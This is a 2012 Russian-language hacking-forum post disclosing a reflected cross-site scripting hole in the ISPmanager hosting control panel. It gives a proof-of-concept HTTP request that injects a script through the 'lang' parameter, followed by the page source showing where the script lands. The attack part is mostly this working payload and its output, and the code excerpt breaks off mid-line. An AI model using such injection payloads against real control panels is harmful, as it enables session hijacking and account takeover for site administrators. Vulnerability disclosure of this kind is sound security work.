10.07.2012, 16:56
|
|
Постоянный
Регистрация: 13.10.2010
Сообщений: 375
Провел на форуме:
97332
Репутация:
38
|
|
[Intro] Доброго времени суток.
Ковырял бложек, наткнулся на сабж. В сабже ХСС.
[PoC] 
Код:
GET /manager/ispmgr?lang=";alert("PWNED+BY+p1r0!");// HTTP/1.1
Cookie: PHPSESSID=nblmvs0lg0bfgvhu0uk4l1r2t5; ads=4815162342; ground=0; best=5; ispmgr4=aqua:ua:0
Host: site.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept: */*
Код:
var imgpath = '/manimg/aqua/';
document.write( "" );
var binary = "/manager/ispmgr";
function setThemeLang () {
var theme = "aqua";
var lang = "";alert("PWNED BY p1r0!");//";
for ( var i=0; i
Офф сайт разрабов: http://ispsystem.com/ru/ |
|
|